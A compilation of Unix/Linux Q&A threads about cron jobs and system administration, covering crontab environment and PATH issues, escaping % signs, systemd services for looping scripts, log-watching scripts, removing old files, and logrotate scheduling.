| Kubuntu 18.04, cron task does not load @reboot |
1,645,675,515,000 |
I am trying to repeatedly execute python script(s) using Cron. I have written a shell script that calls that/these python script(s). I have made the shell script as an executable and works perfect both in terminal and just by clicking to execute.
I have changed the crowntab to call my shell script at a specific - usually in a minute or two - time intervals to see if it is working. However, it seems my script is not being executed properly.
My python script is a long one and it also has local python functions that it calls. Nevertheless, I created a short python program as well as a shell script to call it for the purpose of finding out if the cron works and, it seems, that it is being called as intended.
Why my python/shell script is not being called properly for execution? If I call a shell script, do I still need to include path for the cron to see?
My crontab:
20 13 * * * /my/full/path/to/the/shell_script.sh
My shell script/file:
#!/bin/bash
cd /full/path/to/the/python_script_folder
sudo python3 python_script.py argument
RPi3 /var/log/syslog:
Jan 23 20:13:01 raspberrypi cron[477]: (pi) RELOAD (crontabs/pi)
Jan 23 20:13:01 raspberrypi CRON[3851]: (root) CMD (/etc/myDevices/crontab.sh)
Jan 23 20:13:01 raspberrypi CRON[3854]: (pi) CMD (/my/full/path/to/the/shell_script.sh)
Any help is appreciated. If you need any additional information, please let me know. Thank you.
|
As @thrig mentioned - sudo is probably asking for password and bash -x will give additional info of what is executed and what is the output.
First of all, it's a good practice to redirect cron output, e.g.
20 13 * * * /my/full/path/to/the/shell_script.sh > ${HOME}/cron.log 2>&1
This will give you output of the script logged in the file.
I would:
place the entry in crontab of the user that needs to run it.
drop the wrapper and set the command as 'python3 /path/to/script.py args'
| Cron calling a shell script that calls a python script [RPi3] |
1,645,675,515,000 |
Details
OS: Solaris 10 , update 11
HW: M5-32 LDOM, V490, IBM x3650, T5240, VMware virtual machine, etc...
EDITOR=vi
term=vt100
tmp directory=/var/tmp
cron shell=/sbin/sh
My shell=/bin/bash
Issue
A very interesting error occurs when attempting to modify the crontab via crontab -e.
If I attempt to search for a non-existent string utilizing crontab -e to verify and check syntax with vi as my editor, and then try and save, it will puke back and tell me an error has occurred even if no changes were made.
Example
admin@server# export EDITOR=vi
admin@server# crontab -e
In command mode, search for a non-existent string like "foobar123". After receiving the "Pattern not found" then attempt to :wq and you'll receive...
The editor indicates that an error occurred while you were
editing the crontab data - usually a minor typing error.
Edit again, to ensure crontab information is intact (y/n)?
('n' will discard edits.)
If you are cheeky and choose to go right back in and attempt to save it will now save sans error. This is repeatable from on all types of Solaris from VMware to M5-32 LDOM, to a V490 physical. Curious as to why cron would interpret a search for a non-existent string as an error, but not say visudo.
A related note is Solaris 11 will not produce this error, which then begs the question if this is some sort of POSIX specification why it would apply to Solaris 10 and not 11?
|
Not having the source to Solaris 10 or Solaris 11, I can't say for sure, but I suspect that Thomas Dickey is on the right track, based on his findings with vim.
I tracked down the IllumOS source where a search for errcnt in the ex/vi directory shows that errcnt is only ever incremented, and errcnt is used as the return code from main().
Thus, any failure that increments errcnt in vi will "bubble up" to the crontab command, where the IllumOS source for crontab indicates that it will be unhappy with anything other than zero.
Notice also the comment in crontab.c!
311 ret = system(buf);
...
327 if ((ret) && (errno != EINTR)) {
328 /*
329 * Some editors (like 'vi') can return
330 * a non-zero exit status even though
331 * everything is okay. Need to check.
332 */
| Error while searching for non-existent string with EDITOR=vi crontab -e |
1,645,675,515,000 |
I have a computer with Ubuntu server 15.10 installed on it that sits in the same room I am in. I use it just as a Minecraft server, map renderer and whatever else php scripts I want to run scheduled within my house. I have a few cronjobs set up to render map at 3am, back up game server at 2am, restart Minecraft if server dies (cron runs every minute and checks if the process is running, if not starts it). All this works great, except for the fact my crontab disappears after a day or so.
I am setting it on my regular user account I login with (some of the things don't run when running as root). I edit it with crontab -e which opens in vim. I can list it with crontab -l, I even tried resetting it with crontab -r and manually adding my lines again at the bottom but whatever I do it reverts back to a single line I entered ages ago which I now don't even want running.
Any idea what could be causing this?
|
The problem came from this Minecraft backup script. It was set to create the cronjob itself but it would just wipe the entire crontab for whatever reason. Reporting it on their issue tracker.
| Crontab resetting itself |
1,645,675,515,000 |
I have to write a shell-script that have to do the following tasks:
-in every 5 seconds it saves:
-how many users are using joe and/or vi;
-if someone was using vi at the last examination, but now he isn't using it anymore, the program should print something about that user and if he is your group that you should send him a mail;
-in every minute it prints:
-the last minute`s statistics about the usage of joe and vi;
-the change by the average of usage (increased or decreased);
Any suggestions?
|
a=`ps -ef | grep "joe" |wc -l`
b=`ps -ef | grep "vi" | wc -l`
echo `date +"%Y%M%D %T"` $a $b >> somelogfile
put them under crontab
also, in /etc/profile put the something like following:
alias vi "vi; mail -s "some message" mailbox"
| bash script - supervisor program |
1,645,675,515,000 |
I'm trying to run a script that calls zenity from a crontab and it fails. The script works well from the command line.
I do pass the DISPLAY in the crontab:
* * * * * DISPLAY=:1 bin/myscript.sh > /tmp/debug.txt 2>&1
In the debug logs, I get:
This option is not available. Please see --help for all possible usages.
Trying to remove the options, I found that the problematic is "--text" because the following doesn't work:
zenity --warning --title "Fais gaffe" --text "Bientôt plus de batterie"
But the following does:
zenity --warning --title "Fais gaffe"
|
It turns out that the issue is in the content of the text.
I'm not sure what the difference is between running the script in the command line or in crontab, but the ô is causing the issue.
Replacing it by a o, the command works fine in the crontab too:
zenity --warning --title "Fais gaffe" --text "Bientot plus de batterie"
| zenity failing in crontab but working in shell |
1,645,675,515,000 |
I want to run a script every day at 10:25 (exact hour is not important) on my Raspberry Pi (running Raspbian Jessie).
With that line : 25 10 * * * /home/pi/test.sh
it gave no results, no output and no activity log.
I tried with * * * * * /home/pi/test.sh and there magic happens ! It worked fine, producing CMD (/home/pi/test.sh) in the cron logs, and creating the desired output file.
The script I used for test purposes:
#!/bin/bash
echo `date` > /home/pi/test.txt
Does someone has any idea on why cron doesn't run the script ?
|
From the crontab manpage
Commands are executed by cron(8) when the minute, hour, and month of
year fields match the current time, and at least one of the two day
fields (day of month, or day of week) match the current time
You are required to have one of the day fields. If you want this to run at 10:25 every day, just use
25 10 * * 0-6 /home/pi/test.sh
EDIT: This is actually incorrect because all * mark the crontab as executing every minute. We figured out it was system time issue. Double-check your system time. The cron daemon operates off of UTC. Since the script worked when you set all the fields to *, we know the actual logic is working.
| Why does crontab works with wildcards (*) but not with numbers? |
1,645,675,515,000 |
I added a new cronjob with a user (SUSE LINUX Enterprise Server 9.4):
# su - XXX
$ crontab -e
and this is what I added:
* * * * * echo `date` >> /home/XXX/a.txt
but the a.txt isn't created... it will be ONLY created when root restarts the crond...
Q: Why?
UPDATE:
machine:~ # chage -l XXX
Minimum: 1
Maximum: 99999
Warning: 7
Inactive: -1
Last Change: Apr 11, 2011
Password Expires: Never
Password Inactive: Never
Account Expires: Never
machine:~ #
so the user or it's password doesn't expired.
UPDATE:
cron version:
cron-3.0.1-920.18
and I tried to add a new crontab to the root user.. it's the same :D the new root cronjobs aren't running too.. :D it looks like "crontab -e" doesn't reloads CROND or something...
|
strace crontab -e
solved it... dunno how.. but it works now.. but all I wanted to do is to check the crontabs lowlevel "operations"..
| Why are new cronjobs ignored unless crond is restarted in SLES? [closed] |
1,400,072,087,000 |
I am using bellow to run a page every hour in my Virtualmin installed on CentOS 7
wget https://domain.tld/index.php?page=cron > /dev/null 2>&1
but it creates below files every hour when cron run
index.php?page=cron
index.php?page=cron.1
index.php?page=cron.2
etc.
Please let me know how to avoid creation of these file.
|
wget, by default, saves the fetched web page in a file whose name corresponds to the document at the end of the URL (it does not send it to its standard output). If that file already exists, it adds a number to the end of the name.
If you don't want to save the document, then specify that you'd like to save it in /dev/null:
wget -O /dev/null 'https://domain.tld/index.php?page=cron' >/dev/null 2>&1
or
wget --output-document=/dev/null --quiet 'https://domain.tld/index.php?page=cron'
It's also a good idea to quote the URL as URLs sometimes contain characters that may be interpreted a filename globbing character or command terminators by the shell (like & and [ and ] etc.).
| How to prevent text file creation by wget in cron job run? |
1,400,072,087,000 |
I want to name file according to parity of a day of a week.
In the terminal the following works: $(($(date +\%u)%2))
But this doesn't work in cron (I suspect evaluating of mathematical expressions doesn't work).
How can I make this working in cron?
|
You escaped one percent sign and not the other:
$(($(date +\%u)%2))
^
HERE
All percent signs in a crontab entry need to be escaped, because % has special meaning there. To quote from the crontab(5) manpage:
The entire command portion of the line, up to a newline or % character, will be executed by /bin/sh or by the shell specified in the SHELL variable of the crontab file. Percent-signs (%) in the command,unless escaped with backslash (), will be changed into newline characters, and all data after the first % will be sent to the command as standard input.
Admittedly, that paragraph could be worded better.
So that needs to be:
$(($(date +\%u)\%2))
| Evaluate mathematic expression in cron |
1,400,072,087,000 |
I know about nohup. It prevents processes from dying after a hang-up.
What I want is my user crontabs to run even if my session has timed out when they are supposed to run. I believe I need the user to be still logged on for that to happen.
How do I make sure that the user's crontab are run whatever if he's logged on or not?
Do I need to make the user actually is logged on?
Should I use a system crontab instead?
Any other solutions?
|
cron runs whether you are logged-in or not.
It's a daemon that checks items in the crontab (cron table) and runs them at the appointed time(s).
If you had to be logged-in to do it, it would be pretty unhelpful - more like running a process in the background after a sleep, or in a loop.
| Do I need to keep an SSH session alive for cron to run? |
1,400,072,087,000 |
I have a script that have "while true" loop. And I want to run that script from cron on every minute, so that when the process is killed (or is failed - no matter why) cron will run the script again.
But when I'm checking the ps -aef --forest there is my process runned by /usr/sbin/CROND -n. This wasn't be bad for cron or system? Or maybe I should do it differently?
|
Maybe a short example for a systemd service will do.
This is our infinite script, location /path/to/infinite_script , executable bit set:
#!/bin/bash
while ((1)) ; do
date >> /tmp/infinite_date
sleep 2
done
No we need to define a service file:
[Unit]
#just what it does
Description= infinite date service
[Service]
#not run by root, but by me
User=fiximan
#we assume the full service as active one the script was started
Type=simple
#where to find the executable
ExecStart=/path/to/infinite_script
#what you want: make sure it always is running
Restart=always
[Install]
#which service wants this to run - default.target is just it is loaded by default
WantedBy=default.target
and place it in /etc/systemd/system/infinite_script.service
Now load and start the service (as root):
systemctl enable infinite_script.service
systemctl start infinite_script.service
The service is running now and we can check its status
systemctl status infinite_script.service
● infinite_script.service - infinite date service
Loaded: loaded (/etc/systemd/system/infinite_script.service; enabled; vendor preset: enabled)
Active: active (running) since Tue 2019-05-28 14:18:52 CEST; 1min 33s ago
Main PID: 7349 (infinite_script)
Tasks: 2 (limit: 4915)
Memory: 1.5M
CGroup: /system.slice/infinite_script.service
├─7349 /bin/bash /path/to/infinite_script
└─7457 sleep 2
Mai 28 14:18:52 <host> systemd[1]: Started infinite date service.
Now if you kill the script (kill 7349 - main PID) and check the status again:
● infinite_script.service - infinite date service
Loaded: loaded (/etc/systemd/system/infinite_script.service; enabled; vendor preset: enabled)
Active: active (running) since Tue 2019-05-28 14:22:21 CEST; 12s ago
Main PID: 7583 (infinite_script)
Tasks: 2 (limit: 4915)
Memory: 1.5M
CGroup: /system.slice/infinite_script.service
├─7583 /bin/bash /path/to/infinite_script
└─7606 sleep 2
Mai 28 14:22:21 <host> systemd[1]: Started infinite date service.
So note how it was just restarted instantly with a new PID.
And check the file ownership of the output:
ls /tmp/infinite/date
-rw-r--r-- 1 fiximan fiximan 300 Mai 28 14:31 infinite_date
So the script is run by the correct user as set in the service file.
Of course you can stop and disable the service:
systemctl stop infinite_script.service
systemctl disable infinite_script.service
EDIT:
A few more details: a user's personal services can (by default) be placed in $HOME/.config/systemd/user/ and managed accordingly with systemctl --user <commands>. No root needed just like with a personal crontab.
| How should I run a cron command which has forever loop? |
1,400,072,087,000 |
I would like cron to run a script from a specific shell (Zsh). I thought the following would work:
00 02 * * * exec zsh; /path/to/script.sh
but apparently it doesn't, why?
This also made me wonder, how do I find out what shell and init scripts does cron run first prior to running the entry in crontab?
|
How about:
00 02 * * * exec /usr/bin/zsh /path/to/script.sh
That will tell zsh to run the script. Now you want it to be run in zsh doesn't matter what, just add the shebang in the start:
#!/usr/bin/zsh
the_rest
| Running a cron job from another shell |
1,400,072,087,000 |
I am creating a crontab that compresses 15 minute clips from my security camera into one file (24 Hours Long) and then having the clips delete.
avimerge -o /media/jmartin/Cams/video/Full_$(date +%F --date "Yesterday") -i /media/jmartin/Cams/video/$(date +%F --date "Yesterday")* # Converts files from the past 24 hours into one .avi
rm /media/jmartin/Cams/video/$(date +%F --date "Yesterday")* # Removes old clips that have already been compressed
My question is What is the danger of using the $date variable. Could something possibly happen where it deletes all files in /video/? What would you recommend as a safer alternative?
Example filenames (Yes, those are spaces in the filename):
2016-04-25 00:00:01.avi
2016-04-25 00:15:02.avi
2016-04-25 00:30:02.avi
2016-04-25 00:45:01.avi
|
Two things jump out:
You have no checking for failure of the substitution
There is a race condition if the date changes between uses of the date command.
You could solve them both like this:
#/bin/bash
# Exit if any command fails
set -e
dir='/media/jmartin/Cams/video'
day=$(date +%F --date Yesterday)
# Conbine files from the past 24 hours into a single AVI file
avimerge -o "$dir/Full_$day" -i "$dir/$day"*
# Remove old clips that have already been compressed
rm "$dir/$day"*
| Dangers of using rm command with variables |
1,400,072,087,000 |
I have a virtual server (debian) and the clock fails to sync from time to time (probably because i save/restore state with vboxheadlesstray).
To fix this issue I run dpkg-reconfigure ntp && ntpq -p, it works when I run it as root, but doesn't work with cron. I have added it in crontab -e (as root user) and is using this line:
1 * * * * dpkg-reconfigure ntp && ntpq -p > /dev/null 2>&1
My ordinary user user get mail about it saying /bin/sh: 1: dpkg-reconfigure: not found, why is my ordinary user getting the mail and not root and what do I need to change to make it work?
|
In Debian, dpkg-reconfigure is located under /usr/sbin, and root obviously has it in his $PATH, but cron limits $PATH to /usr/bin:/bin, even for root.
See man 5 crontab :
Several environment variables are set up automatically by the cron(8) daemon.
SHELL is set to /bin/sh, and LOGNAME and HOME are set from the /etc/passwd line of the crontab's owner.
PATH is set to "/usr/bin:/bin". HOME, SHELL, and PATH may be overridden by settings in the crontab;
LOGNAME is the user that the job is running from, and may not be changed.
So you would have to modify your crontab :
giving full path :
1 * * * * /usr/sbin/dpkg-reconfigure ntp && ntpq -p > /dev/null 2>&1
or with modified $PATH :
PATH=/usr/bin:/bin:/usr/sbin
1 * * * * dpkg-reconfigure ntp && ntpq -p > /dev/null 2>&1
It would work, but it would not be clean :p
You'd better follow above recommandation, assuming you have a working ntp daemon, or just put that job instead :
10 * * * * /usr/sbin/ntpdate &>/dev/null
| dpkg-reconfigure: not found when running in cron |
1,400,072,087,000 |
I have the following command set used to update all my WordPress sites in my CentOs shared-hosting partition on my hosting provider's platform (via daily cron).
The wp commands inside the pushd-popd set, are of the WP-CLI program, which is a Bash extension used for various shell-level actions on WordPress websites.
for dir in public_html/*/; do
if pushd "$dir"; then
wp plugin update --all
wp core update
wp language core update
wp theme update --all
popd
fi
done
The directory public_html is the directory in which all website directories are located (each website usually has a database and a main file directory).
Given that public_html has some directories which are not WordPress website directories, than, WP-CLI would return errors regarding them.
To prevent these errors, I assume I could do:
for dir in public_html/*/; do
if pushd "$dir"; then
wp plugin update --all 2>myErrors.txt
wp core update 2>myErrors.txt
wp language core update 2>myErrors.txt
wp theme update --all 2>myErrors.txt
popd
fi
done
Instead writing 2>myErrors.txt four times (or more), is there a way to ensure all errors whatsoever, from every command, will go to the same file, in one line?
|
The > file operator opens the file for writing but truncates it initially. That means that each new > file causes the content of the file to be replaced.
If you'd want the myErrors.txt to contain the error of all the commands, you'd need either to open that file only once, or use > the first time and >> the other times (which opens the file in append mode).
Here, if you don't mind the pushd/popd errors to also go to the log file, you can redirect the whole for loop:
for dir in public_html/*/; do
if pushd "$dir"; then
wp plugin update --all
wp core update
wp language core update
wp theme update --all
popd
fi
done 2>myErrors.txt
Or you could open the log file on a fd above 2, 3 for instance, and use 2>&3 (or 2>&3 3>&- so as not to pollute commands with fds they don't need) for each command or group of commands you want to redirect to the log file:
for dir in public_html/*/; do
if pushd "$dir"; then
{
wp plugin update --all
wp core update
wp language core update
wp theme update --all
} 2>&3 3>&-
popd
fi
done 3>myErrors.txt
| Redirect all lines of code to the same file in a single line |
1,400,072,087,000 |
Let's say I send an email, containing a link to my website, to someone that I really hope he'll visit it (fingers-crossed style):
http://www.example.com/?utm_source=email392
or
http://www.example.com/somefile.pdf?utm_source=email392
How to make Linux trigger an action (such as sending an automated email to myself) when this URL is visited, by regularly examining /var/log/apache2/other_vhosts_access.log?
I can't do it at PHP level because I need to do it for various sources/websites (some of them use PHP, some don't and are just link to files to be downloaded, etc.; even for the websites using PHP, I don't want to modify every index.php to do it from there, that's why I prefer an Apache log parsing method)
|
Live log monitoring using bash process substitution:
#!/bin/bash
while IFS='$\n' read -r line;
do
# action here, log line in $line
done < <(tail -n 0 -f /var/log/apache2/other_vhosts_access.log | \
grep '/somefile.pdf?utm_source=email392')
Process substitution feeds the read loop with the output from the pipeline inside <(...). The log line itself is assigned to variable $line.
Logs are watched using tail -f, which outputs lines as they are written to the logs. If your log files are moved periodically by logrotate, add --follow=name and --retry options to watch the file path instead of just the file descriptor.
Output from tail is piped to grep, which filters the relevant lines matching your URLs.
| Trigger an action when an URL has been visited |
1,400,072,087,000 |
[srinkann@sjc-ads-440 ~]$ crontab -e
no crontab for srinkann - using an empty one
/bin/sh: /usr/bin/vi: No such file or directory
crontab: "/usr/bin/vi" exited with status 127
[srinkann@sjc-ads-440 ~]$
In Google, i got the below solution, but no permission for me to do that.
ln -s /bin/vi /usr/bin/vi
|
I suppose that you can use vi. There is a workaround:
crontab -l > crontab.txt
vi crontab.txt
crontab crontab.txt
You can make your modifications in the crontab.txt.
| Not able to schedule tasks in crontab |
1,400,072,087,000 |
I remember messing around with crontab and setting up email capabilities on a server many months back, and now all of a sudden I'm getting the following email:
EMAIL HEADER:
from: root <[email protected]>
to: root
date: Thu, Dec 5, 2013 at 6:48 AM
subject: Cron <root@server-ip> test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
mailed-by: gmail.com
BODY:
/etc/cron.daily/mlocate:
/usr/bin/updatedb.mlocate: `/var/lib/mlocate/mlocate.db' is locked (probably by an earlier updatedb)
run-parts: /etc/cron.daily/mlocate exited with return code 1
|
This is a cron job that updates the indexes for mlocate, which is used when you run locate on your system to find files. This index allows the program to quickly find files without traversing the filesystem (which is much more expensive, because it's not optimised for that use case). For some reason, the lock file that stops more than one database update happening at one time still remains, perhaps because mlocate was terminated unexpectedly and wasn't able to remove the lock file.
To fix this:
Check that there are no updatedb.mlocate processes running (pgrep -x 'updatedb\.mlocate');
If one is running, either wait for it to finish, or if you think it is stuck, terminate it (pkill -x 'updatedb\.mlocate', perhaps using more violent signals if there is no response);
Remove the lock if none are running (rm /var/lib/mlocate/*.lock).
| Mysterious automated emails |
1,400,072,087,000 |
I am trying to add following command to crontab:
I=1; for X in $(/bin/ls -r /var/tmp/*); do [ $((I++)) -le 28 ] && echo "lower" || echo "higher"; done
When executed on the command line (in bash), the command works fine. But when I add the line into crontab and when executed, cron complains:
/bin/sh: 1: arithmetic expression: expecting primary: "I++"
Do I need to use different syntax in cron ?
EDIT1:
I have replaced sh with bash in my /etc/crontab:
SHELL=/bin/bash
I have restarted cron, but following cron line still does not execute:
(I=1; for X in $(/bin/ls -r /var/tmp/*); do [ $((I++)) -le 28 ] && echo "lower" || echo "higher"; done)
the error suggests, that it is still being interpreted with /bin/sh instead of /bin/bash:
/bin/sh: 1: arithmetic expression: expecting primary: "I++"
|
Cron, if I'm not mistaken, defaults to /bin/sh. Check /etc/crontab/ for the line SHELL=. It is likely set to /bin/sh (dash). I believe you can set SHELL=/bin/bash in your own user crontab file (the one edited by crontab -e). Or you can script it.
| cron: bash syntax not working |
1,400,072,087,000 |
On Debian and its derivatives, how shall we understand the following seemingly contradictory facts:
/etc/crontab and /etc/cron.d/* have a user field, meaning that a job is running as the user (either root or nonroot).
the jobs in /etc/crontab and /etc/cron.d/* are system jobs not user-specific jobs?
If you want to run a job either as root or as a nonroot user, where would you add the job: /etc/crontab, /etc/cron.d/*, or /var/spool/cron/crontab/<user>?
Stephen's comment at How are files under /etc/cron.d used? clarifies a lot, but I still can't figure that out
A system job is a job which applies to the whole system. A user-specific job is a job run on behalf of a specific user; typically, tasks which the user would do manually while logged in, but which he/she wishes to perform periodically and automatically — e.g. backups of specific files, or refreshes of remote development repositories, or mail processing, or mirroring web sites
Thanks.
|
I tend to use the various cron configuration files as follows:
/var/spool/cron/crontab is used by “real” users (i.e. users corresponding to humans using the system), edited using crontab -e;
/etc/cron.d is used for package-provided cron jobs, which can run as a “system” user (e.g. logcheck for logcheck’s cron jobs); as mentioned in answers to some of your other questions on the topic, /etc/cron.d is intended for use by packages, at least on Debian-based systems;
/etc/crontab would be used for locally-defined system jobs, run as root, except that I find /etc/cron.{hourly,daily,weekly,monthly} more convenient for those.
In my comment, by “user” I meant “human-backed user” (if you’ll allow me the expression). Jobs run as “system users”, root or otherwise, are system jobs in my mind.
From a Debian packaging perspective, Debian Policy describes the recommended practice regarding cron jobs: in summary, use /etc/cron.{hourly,daily,weekly,monthly} if appropriate, /etc/cron.d otherwise. It’s therefore normal to see package-provide jobs in all five directories.
| user specific jobs vs system jobs running as specific users |
1,400,072,087,000 |
In /etc/cron.d/myjob, I create a cron task of running a bash script and redirect its stdout and stderr to a log file. The script contains a line of sudo running a command.
In the log file:
sudo: no tty present and no askpass program specified
Does that cause some problem that needs my attention?
I was wondering if cron tasks in /etc/cron.d/ files are supposed to not contain sudo?
Thanks.
|
"Supposed" is a judgement call.
Commands called from /etc/cron.d/ are run as a specified user (either root or any other one; it's defined in the cron line). So, normally, there's no need for sudo.
However if you do have a script that calls sudo then you need to make sure the sudoers entry is correct. In particular:
Make sure the entry is assigned to the user running the script (this may be root)
Make sure the entry has the NOPASSWD attribute set so it can run without anyone needing to enter a password.
The error you're seeing is because the sudo command need a password, but there's no terminal to provide it.
A well written script would detect if it was running with the right permissions and not call sudo at all, but there's a lot of bad scripts :-)
| Are cron tasks in `/etc/cron.d/` files supposed to not contain `sudo`? |
1,400,072,087,000 |
In Ubuntu 16.04, this is the code I have in /etc/cron.daily/cron_daily:
#!/bin/bash
for dir in "/var/www/html/*/"; do
if pushd "$dir"; then
wp plugin update --all --allow-root
wp core update --allow-root
wp language core update --allow-root
wp theme update --all --allow-root
rse
popd
fi
done
I setted this up yesterday and today I got this error into my email:
/etc/cron.daily/cron_daily:
/etc/cron.daily/cron_daily: line 3: pushd:
/var/www/html/*/: No such file or directory
Why is this happening? I assume the quote marks prevent the shell globbing but if so, what should replace them?
|
Extending the path with * does not work in double quotes.
You could try it like this:
#!/bin/bash
for dir in /var/www/html/*/; do
if pushd "$dir"; then
wp plugin update --all --allow-root
wp core update --allow-root
wp language core update --allow-root
wp theme update --all --allow-root
rse
popd
fi
done
| Ubuntu cron.daily returns a path error when a shell glob is used - what's wrong with my path? |
1,400,072,087,000 |
I'm trying to delete files older than six days, then log the files which get deleted.
So far.
In a sh file, I got following;
find /home/pi/ftp/upload -type f -mtime +6 -exec rm {} +
Then within sudo crontab
59 23 * * * /home/pi/scripts/cullftp.sh > /var/log/ftp/`date +\%Y-\%m-\%d-\%H\%M\%S`-cull.log 2>&1
But when it runs at midnight, which only creates a empty file, and none of the files get deleted.
Although this bit of the code work:
find /home/pi/ftp/upload -type f -mtime +6
What is the best way to solve this.
|
1) Make sure the script file is executable, and has a proper hashbang line (#!/bin/sh or #!/bin/bash or such), though you should get an error if it isn't executable.
2) find ... -exec rm will not print anything, you'd need to explicitly tell find to print the filenames too, e.g. find ... -exec rm + -print or find ... -delete -print if your find supports -delete.
3) At least on GNU find, -mtime +6 has some interesting rounding. It first rounds the time down to full days (24 h periods), and then sees if the resulting time is strictly greater than 6. The result is that it only matches files that are at least 7*24 hours old. Using something like -mmin +8640 would lessen the impact. (6 days * 24 h/day * 60 min/h = 8640 min)
| shell script to remove files |
1,400,072,087,000 |
I'm using Let's Encrypt to generate SSL certificates automatically every 60-days using a simple shell script.
After the script has reloaded these it tries to reload my services using the commands I would type myself into a shell, i.e- service postfix reload and service dovecot reload.
However, while the first of these works just fine, the service dovecot reload does not work, complaining of an unrecognised service.
The script is being run as root as a cron-job, so I would expect it to recognise all the same services as when I'm logged in as root myself, yet for some reason dovecot is not recognised, but others are without issue, meaning I have to manually reload dovecot before the old certificates expire, kind of limiting the benefit of my script!
What is different about dovecot that would cause it to be unrecognised by my script, but be recognised without issue when I log in as root myself?
Output of lsb_release -a:
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty
Output of ps aux | grep dovecot:
root 860 0.0 0.1 22144 1052 ? Ss May09 1:33 /usr/sbin/dovecot -F -c /etc/dovecot/dovecot.conf
dovecot 1466 0.0 0.0 9288 572 ? S May09 0:11 dovecot/anvil
vmail 22753 0.0 0.4 23904 4116 ? S 16:58 0:00 dovecot/imap
vmail 22754 0.0 0.5 25408 5764 ? S 16:58 0:00 dovecot/imap
dovenull 24108 0.0 0.3 19188 3812 ? S Sep26 0:10 dovecot/imap-login
root 24109 0.0 0.1 9416 1472 ? S Sep26 0:00 dovecot/log
root 24111 0.0 0.2 23772 2660 ? S Sep26 0:01 dovecot/config
vmail 30218 0.0 0.3 23244 3676 ? S 22:40 0:00 dovecot/imap
vmail 30219 0.0 0.3 23252 3540 ? S 22:40 0:00 dovecot/imap
root 30293 0.0 0.4 27924 4416 ? S 22:44 0:00 dovecot/lmtp
dovecot 30294 0.0 0.4 39632 4756 ? S 22:44 0:00 dovecot/auth
root 30295 0.1 0.4 39728 4900 ? S 22:44 0:00 dovecot/auth -w
|
It seems that your problem is because cron scripts run with a different PATH value by default. For example, on Ubuntu as root you have /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin in your PATH by default. But your cron script running as root has a more limited PATH value: /usr/bin:/bin.
I recommend you to to set the PATH environment variable at the top of your cron scripts:
PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'
In this particular case the problem is that the service script uses /sbin/initctl (Upstart), which is not in the PATH used by cron. If that command fails, it then tries to use the traditional /etc/init.d/${SERVICE} script. But not all the services include that old script and that's why your script works with some services but not with others.
| cron script: dovecot: unrecognized service |
1,400,072,087,000 |
Just an one line shell script below not working as a cron job but executing directly from terminal works fine:
#!/bin/bash
echo "Executed" >> ./crond.log 2>&1
What might be the problem?
Checked /var/log/cron and found cron is kicking the task in time:
May 16 10:30:01 vagrant-centos64 CROND[3015]: (root) CMD (sh /vagrant/my.sh)
May 16 10:35:01 vagrant-centos64 CROND[3122]: (root) CMD (sh /vagrant/my.sh)
May 16 10:40:01 vagrant-centos64 CROND[3189]: (root) CMD (sh /vagrant/my.sh)
May 16 10:45:01 vagrant-centos64 CROND[3270]: (root) CMD (sh /vagrant/my.sh)
May 16 10:50:01 vagrant-centos64 CROND[3343]: (root) CMD (sh /vagrant/my.sh)
May 16 10:55:01 vagrant-centos64 CROND[3430]: (root) CMD (sh /vagrant/my.sh)
Crontab job listing is like below:
*/5 * * * * sh /vagrant/mypagelogin.sh
*/5 * * * * sh /vagrant/my.sh
[root@vagrant-centos64 vagrant]#
Access permission for crond.log is:
-rwxrwxrwx 1 vagrant vagrant 0 May 16 10:51 crond.log
UPDATE: crond.log file is located in the same location as my.sh. [/vagrant]
|
First rule of crond club: you don't assume the working directory. My guess is that you'll find a crond.log in /root. If you want it in /vagrant, explicitly redirect the output to /vagrant/crond.log.
(FWIW, the second rule of crondclub is: don't assume there's anything in your PATH, use explicit paths to binaries, but since echo is also a bash builtin, you're fine on that one.)
| Cron Job: Redirecting shell script output to a file |
1,400,072,087,000 |
I'm running some cron jobs on my machine and every time I fire up a terminal session I'm getting a 'You have mail' message (the job produces output on success which gets mailed to me).
Any way to turn this notification off?
|
The exact mechanism depends on what shell is running in the "terminal session". For the BASH shell, the man page for "bash" says:
MAILCHECK
Specifies how often (in seconds) bash checks for mail. The
default is 60 seconds. When it is time to check for mail, the
shell does so before displaying the primary prompt. If this
variable is unset, or set to a value that is not a number
greater than or equal to zero, the shell disables mail checking.
so setting MAILCHECK=-1 in your .bashrc file would do it. Other shells have man pages with similar advice. (My bash 5.0.17 refuses to let me set the variable to a non-integer unless I first unset it, so the man page is incomplete about using "not a number".)
| Turn off mail notification in terminal |
1,400,072,087,000 |
I want to be able to type a line of command to do the following two commands that I know:
cd ~/rpitwit_commands/
rpitwit
This is because I want to automatically run it upon boot in crontab, and it has to run from within that directory. How do you guys suggest I do so? Do note that the actual application file is not in that directory (i'm not sure how this works in debian linux).
|
When you run commands with cron, the $PATH is set to a minimal list, so it's always best to run commands with full path or first set PATH.
You can execute multiple commands in one go (works with cron too) like this:
cd /home/username/rpitwit_commands && /path/to/command/rpitwit
If you need to stay in the original directory after the commands execute, place them between ( ) to run them in a subshell.
| Command to run an application within a specific directory |
1,400,072,087,000 |
I am working on CentOS.
I have created a PHP file which run from browser
http://mydomain.com/backupfile/dobackup.php
I have added the script from crontab and made the file executable, but it is not running
30 0 * * * /var/www/vhost/mydomain.com/httpdocs/backupfile/dobackup.php
what should i do?
|
Add shebang at the top of your code
#!/usr/bin/php
| CentOS, PHP file is running from browser, not from cron daemon |
1,400,072,087,000 |
While doing log rotation, we have two options -
Using the daily directive in the logrotate file -
/var/log/wtmp {
daily
minsize 1M
create 0664 root utmp
rotate 1
}
Putting the logrotation file path in /etc/cron.daily/logrotate
Which method is the preferred method and what are the pros and cons of each?
|
/etc/cron.daily/logrotate and rotation configuration files serve different purposes.
/etc/cron.daily/logrotate ensures that logrotate, the tool, is run once a day (if the system is up). It also determines the configuration file that is read, /etc/logrotate.conf. Since the latter typically includes files in /etc/logrotate.d, you generally don’t need to modify it to add new configuration files — instead, add the configuration files to /etc/logrotate.d.
The rotation configuration files determine what happens to each managed log file. This is largely independent of what /etc/cron.daily/logrotate says; the main constraint added by the latter is that logs can’t be rotated more often than logrotate runs, so with the default daily setup, logs can’t be rotated more often than daily.
